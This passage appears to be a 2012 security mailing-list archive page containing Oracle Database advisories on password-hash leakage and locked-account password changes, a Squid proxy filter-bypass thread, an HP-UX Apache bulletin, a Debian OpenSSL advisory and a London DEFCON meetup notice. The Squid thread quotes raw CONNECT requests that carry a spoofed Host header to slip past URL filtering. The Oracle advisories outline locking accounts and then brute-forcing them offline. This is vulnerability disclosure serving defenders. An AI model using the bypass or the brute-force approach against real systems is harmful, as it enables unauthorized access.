OCIPasswordChange API leaks information of password hash (CVE-2012-0511)

2012-04-20 Thread Esteban Martinez Fayo

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

OCIPasswordChange API leaks information of password hash.

Risk Level:
High

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.4 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
accounts that have the password expired so that the user is able to
change an expired password for a new one.
It was observed that for locked accounts this API leaks information
about the correct user password hash by giving different responses,
depending on whether the decryption of the new password
(AUTH_NEW_PASSWORD field), performed by the server, is successful or
not.  This information can be used to perform an off-line brute force
attack to guess the correct password.  Internal proof-of-concept tool
demonstrated that it is possible to try millions of passwords per
second, making it possible to crack passwords that are less than 9
characters length in a few hours.
Note that to perform this attack the account must be locked.  An
attacker can lock an account by reaching the maximum failed login
attempts limit (by default 10).  The attacker will be able to log in as
the user once the account is unlocked.

Impact:
Remote unauthenticated attackers can perform off-line unlimited password
guesses on locked database accounts.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Implement a strong password policy.
Use some kind of external authentication (like network or directory
service based) instead of native database authentication.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0511

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3434

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012




- -- 
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+QeeMACgkQRx91imnNIgEmCQCcCLZ1sAbpmovyaaa5xJ+Zi41u
KkYAn1jcGgpMrvGuDE/7dvSIi5bOzQcO
=P0et
-END PGP SIGNATURE-

Incomplete protection of Oracle Database locked accounts (CVE-2012-0510)

2012-04-20 Thread Shatter

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

AppSecInc Team SHATTER Security Advisory

Incomplete protection of Oracle Database locked accounts.

Risk Level:
Low

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.5 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
accounts that have the password expired so that the user is able to
change an expired password for a new one.
It was observed that this API can be used to change the password of
users that are locked.  The purpose of locking an account is to
deactivate it once it has received too many failed logins attempts or
when no login is expected.  If it is allowed to change the password of a
locked account it is not correctly protecting it because brute force can
be applied on an account to change its password and eventually it will
get changed to a known password. The attacker will be able to log in
using the account only once it is unlocked.

Impact:
An unauthenticated attacker can perform on-line brute force of accounts
to change the password to a known value.  The attacker will be able to
log in using the account only once it is unlocked.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0510

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3443

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- --
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (MingW32) - WinPT 1.4.3
Charset: UTF-8

iEYEARECAAYFAk+QeAYACgkQRx91imnNIgHaiACgvwlCq4y6e/DAkhMElhbEIBUA
3MsAoIXcRsvC6TQP20idA6yA/tihMmyz
=zO5Y
-END PGP SIGNATURE-

RE: Squid URL Filtering Bypass

2012-04-20 Thread Jim Harrison

To be clear, the CONNECT request is a single request/response cycle  between 
the client and the proxy.  Any request body is nonsensical and should be 
ignored by the proxy (or the request can be rejected if the proxy wants to be 
pedantic).  There is nothing that explicitly disallows inclusion of the host 
header in a CONNECT request.  Granted, including the host header incurs some 
degree of ambiguity (the FQDN may resolve to the IP address, but the IP address 
is not guaranteed to resolve to the FQDN), but this is clearly a debatable 
choice on the developer's part as to whether it should be used to determine 
traffic policy applicability for this request.

The proxy should only ignore further data between the client and remote if the 
proxy successfully established a TCP connection between them on the specified 
destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the 
proxy should either queue or reject further communication from the client until 
the TCP connection has been successfully established and the proxy has 
responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error 
response to the client and close the client-to-proxy connection.

Likewise, while the proxy does establish the end-to-end TCP connection between 
the client and upstream server, it is not responsible for any part of the 
encryption that may be involved in that communication - unless it specifically 
offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL 
Forward Proxy (other vendors have similar features).

Also, whether the McAffee proxy allows translating normal HTTP methods to 
CONNECT, then tunneling them to the upstream proxy is irrelevant to the 
question of whether the local proxy actually uses the host header or the host 
portion of the CONNECT request to determine policy applicability.

Regardless - unless the proxy under test explicitly states that the host header 
information is used to determine policy application to a request, there is no 
vulnerability.

Jim

-Original Message-
From: Mario Vilas [mailto:mvi...@gmail.com] 
Sent: Thursday, April 19, 2012 10:03 AM
To: Richard Barrett
Cc: Gabriel Menezes Nunes; bugtraq
Subject: Re: Squid URL Filtering Bypass

What I understand from the advisory is the Squid proxy is basing its filtering 
on the Host header when present, even for the CONNECT command which doesn't 
allow this header at all as it makes no sense. I haven't confirmed the bug but 
what's being described is definitely a vulnerability.

There's also a small misconception in what you said. The proxy will see the 
entire CONNECT request, headers and all - after the request headers there'll be 
a pair of newlines, and only *then* the remaining data is tunneled 
transparently. So it's the second request's headers that the proxy won't see.

On Wed, Apr 18, 2012 at 7:46 PM, Richard Barrett  
wrote:
>
> A forward proxy server when presented with a CONNECT request is solely 
> responsible for attempting to facilitate an end-to-end encrypted path between 
> the requesting client and the far end server. The CONNECT method does no more 
> than create a temporary hole in your firewall.
>
> Only once that is done is a normal HTTP request, including headers such as 
> the Host: header, passed over the encrypted path by the client. Most 
> crucially, the proxy server cannot see the HTTP request or its headers due to 
> the end-to-end encryption. You can use the encrypted path to carry any 
> protocol or data you like and the proxy server is quite oblivious to it as it 
> is opaque to the proxy.
>
> The only access control that the proxy server can perform is based on the 
> CONNECT method request and the server identified in it by either IP number or 
> FQDN and port.
>
> You do not say what the acl is that you have asked Squid to apply but it 
> cannot involve any examination of the Host: header of a request if the 
> CONNECT method is used; only the far end server can see that.
>
> The same  conclusion also applies to your other post about a vulnerability 
> with "McAfee Web Gateway URL Filtering Bypass"
>
> On 16 Apr 2012, at 23:11, Gabriel Menezes Nunes wrote:
>
> > # Exploit Title: Squid URL Filtering Bypass # Date: 16/04/2012 # 
> > Author: Gabriel Menezes Nunes # Version: Squid Proxy # Tested on: 
> > Squid Proxy 3.1.19 # CVE: CVE-2012-2213
> >
> >
> > I found a vulnerability in Squid Proxy that allows access to filtered sites.
> > The software believes in the Host field of HTTP Header using CONNECT method.
> > Example
> >
> > CONNECT 66.220.147.44:443 HTTP/1.1
> > Host: www.facebook.com
> >
> >
> > It is blocked.
> >
> > CONNECT 66.220.147.44:443 HTTP/1.1 (without host field)
> >
> > It is blocked.
> >
> > But:
> >
> > CONNECT 66.220.147.44:443 HTTP/1.1
> > Host: www.uol.com.br (allowed url)
> >
> > The connection works.
> >
> > From here, I can send SSL traffic without a problem. This way, I can

DC4420 - London DEFCON - April meet - Tuesday April 24th 2012

2012-04-20 Thread Major Malfunction

Yes, It's INFOSEC week again, so limber up your shwag carrying muscles 
and head down to get your shiny shiny!!! You know you can never have too 
many stress balls or thumb drives... And while you're there, come and 
see us!


As usual, we are making special arrangements for the influx of bods that 
we would not normally get to see, so please note we are NOT AT THE 
PHOENIX


I'll say it again. We're not there, we're here: The Troubadour

http://maps.google.co.uk/maps/place?cid=11073162209179321373&q=The+Troubadour+Cafe,+London&hl=en&ie=UTF8&ll=51.546549,-0.320492&spn=0.000107,0.000172&t=m&z=13&vpsrc=0

It's not far from Earls Court Tube (District/Piccadilly) and very close 
to the West Brompton train station where the overland choo choo goes 
from t'north round to Clapham, Euston and other places of London...


http://www.tfl.gov.uk/assets/downloads/London-Overground-Network-map.pdf

The UK Conference 44Con are holding an event there:  44Cafe
(from lunchtime) and they are gifting us the venue for the evening. 
How sweet. This kind of splendid venue doesn't come cheap... it will be 
rather different and you will like it. Regulars will need to be

early though, as space will be a bit more limited than usual.

We are in the club downstairs, but there's a full 50's styled cafe 
upstairs for chatting with a great menu and coffee and the odd  beer.
When they say they do 'all day breakfast' they _mean_ it. You can order 
it at 10.30pm...


As for talks, we will have (ahem!), myself (Aperture Labs, Defcon Goon, 
RFIDiot) talking about either new and shiny RFID or RF or both, 
depending on StuffThatNeedsToHappenBeforeItCanGoPublic(tm), and...


Steve Lord (Mandalorian, 44Con Co-organiser) talking about OtherStuff(tm).

Kickoff at 19:30, kickout some time after normal as they have a late 
licence... (website claims 02:00, so let's see how close we can get! :)


See you next week!
MM
--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

[security bulletin] HPSBUX02761 SSRT100823 rev.1 - HP-UX Running Apache, Remote Denial of Service (DoS), Local Increase of Privilege

2012-04-20 Thread security-alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03278391
Version: 1

HPSBUX02761 SSRT100823 rev.1 - HP-UX Running Apache, Remote Denial of Service 
(DoS), Local Increase of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-04-18
Last Updated: 2012-04-18

Potential Security Impact: Remote Denial of Service (DoS), local increase of 
privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX Running 
Apache. These vulnerabilities could be exploited remotely to create a Denial of 
Service (DoS) or to gain a local increase of privilege.

References: CVE-2011-3607, CVE-2012-0021, CVE-2012-0031, CVE-2012-0053

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.22 or earlier
HP-UX B.11.11 running HP-UX Apache Web Server Suite v2.34 or earlier

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-3607(AV:L/AC:M/Au:N/C:P/I:P/A:P)   4.4
CVE-2012-0021(AV:N/AC:H/Au:N/C:N/I:N/A:P)   2.6
CVE-2012-0031(AV:L/AC:L/Au:N/C:P/I:P/A:P)   4.6
CVE-2012-0053(AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following software updates to resolve the vulnerability.
The update for B.11.11 is available for download from 
https://h20392.www2.hp.com/portal/swdepot/try.do?productNumber=HPUXWSATW235
The update for B.11.23 and B.11.31 is available for download from 
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXWSATW323

Web Server Suite Version
 Apache Depot Name

HP-UX Web Server Suite v.3.23
 HP-UX B.11.23 HPUXWS22ATW-B323-64.depot

HP-UX B.11.23 HPUXWS22ATW-B323-32.depot

HP-UX B.11.31 HPUXWS22ATW-B323-64.depot

HP-UX B.11.31 HPUXWS22ATW-B323-32.depot

HP-UX Web Server Suite v.2.35
 HP-UX B.11.11 HP-UX_11.11_HPUXWSATW-B235-.depot

MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v3.23 or subsequent
Install HP-UX Web Server Suite v2.35 or subsequent

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.23
HP-UX B.11.31
==
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
action: install revision B.2.2.15.12 or subsequent

HP-UX B.11.11
==
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
action: install revision B.2.0.64.03 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 18 April 2012 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware an

[SECURITY] [DSA 2454-1] openssl security update

2012-04-20 Thread Raphael Geissert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2454-1   secur...@debian.org
http://www.debian.org/security/  Raphael Geissert
April 19, 2012 http://www.debian.org/security/faq
- -

Package: openssl
Vulnerability  : multiple
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-0884 CVE-2012-1165 CVE-2012-2110

Multiple vulnerabilities have been found in OpenSSL. The Common
Vulnerabilities and Exposures project identifies the following issues:

CVE-2012-0884

Ivan Nestlerode discovered a weakness in the CMS and PKCS #7
implementations that could allow an attacker to decrypt data
via a Million Message Attack (MMA).

CVE-2012-1165

It was discovered that a NULL pointer could be dereferenced
when parsing certain S/MIME messages, leading to denial of
service.

CVE-2012-2110

Tavis Ormandy, Google Security Team, discovered a vulnerability
in the way DER-encoded ASN.1 data is parsed that can result in
a heap overflow.


Additionally, the fix for CVE-2011-4619 has been updated to address an
issue with SGC handshakes.

For the stable distribution (squeeze), these problems have been fixed in
version 0.9.8o-4squeeze11.

For the testing distribution (wheezy), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 1.0.1a-1.

We recommend that you upgrade your openssl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk+QgdEACgkQYy49rUbZzlrPxACgmA4me/ZAVZS/TDIifkHgiU9q
x/QAn0pU8BwEFv8ugmm746OX7jDQMnYP
=JCSE
-END PGP SIGNATURE-

[security bulletin] HPSBMU02764 SSRT100827 rev.2 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Cross Site Request Forgery (CSRF), Denial of Service (DoS), Execution of Arb

IPv6 host scanning in IPv6

Specially crafted webdav request allows reading of local files on liferay 6.0.x

OCIPasswordChange API leaks information of password hash (CVE-2012-0511)

Oracle Enterprise Manager vulnerable to Session fixation (CVE-2012-0528)

HTTP Response Splitting in Oracle Enterprise Manager (pageName parameter) (CVE-2012-0527)

HTTP Response Splitting in Oracle Enterprise Manager (prevPage parameter) (CVE-2012-0526)

SQL Injection in Oracle Enterprise Manager (searchPage web page) (CVE-2012-0525)

Liferay 6.1 can be compromised in its default configuration

SQL Injection in Oracle Enterprise Manager (compareWizFirstConfig web page) (CVE-2012-0512)

Specially crafted Json service request allows full control over a Liferay portal instance

Some failed authentication attempts using OCIPasswordChange API are not recorded (CVE-2012-0511)

OCIPasswordChange API leaks information of password hash (CVE-2012-0511)

Incomplete protection of Oracle Database locked accounts (CVE-2012-0510)

RE: Squid URL Filtering Bypass

DC4420 - London DEFCON - April meet - Tuesday April 24th 2012

[security bulletin] HPSBUX02761 SSRT100823 rev.1 - HP-UX Running Apache, Remote Denial of Service (DoS), Local Increase of Privilege

[SECURITY] [DSA 2454-1] openssl security update

18 matches

Site Navigation

Mail list logo

Footer information